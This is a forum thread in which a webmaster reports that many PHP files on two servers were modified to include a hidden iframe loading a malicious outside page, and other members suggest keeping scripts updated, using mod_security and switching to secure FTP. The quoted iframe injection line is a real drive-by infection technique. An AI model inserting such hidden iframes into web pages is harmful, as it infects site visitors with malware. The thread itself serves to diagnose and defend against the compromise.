Welcome to WebmasterWorld Guest from 22.214.171.124
Forum Moderators: phranque
If it was just my server that got hacked I would have thought that I havent made my server secure enough.
On my own server I have root access, on the other server its just ftp access, passwords are different, one is Plesk the other is CPanel.
Most of the index.php and other php scripts were modified to include the following
<iframe src="http://example.ru:8080/index.php" width=189 height=120 style="visibility: hidden"></iframe>
I was first made aware when I got an email from Google advising me of the problem - "We recently discovered that some of your pages can cause users to be infected with malicious software."
The question is how did they hack me, when can I do to prevent it?
Thank you for your help
[edited by: encyclo at 11:40 am (utc) on July 11, 2009]
[edit reason] obfuscated link to hacker website [/edit]
Do you use some public cms on both sides? That's what you should look at first.
What you can do to prevent it: stay up to date with your non-inhouse scripts. Once an exploit is in the open, they'll use google to find exploitable sites and just run their bots to try it. Stay ahead. You might also want to look at mod_security, at least for your dedicated server.
I also have mod_security already running on my server
The passwords are secure, not based on names, it has both alpha and numeric characters
I will have a look at the apache logs.
Note that FTP is inherently insecure because the password is transmitted in plain-text - using ssh (secure FTP) is a much better option, most FTP clients support secure FTP out of the box, and your servers almost certainly will too.